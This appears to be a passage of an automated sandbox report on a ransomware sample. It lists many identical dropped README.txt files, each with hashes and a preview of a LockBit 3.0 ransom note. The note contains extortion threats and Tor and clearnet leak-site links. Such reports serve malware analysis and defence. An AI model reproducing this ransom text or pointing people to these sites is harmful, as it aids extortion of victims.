                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280810\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280811\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280813\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280815\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314563\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353694\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\353698\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
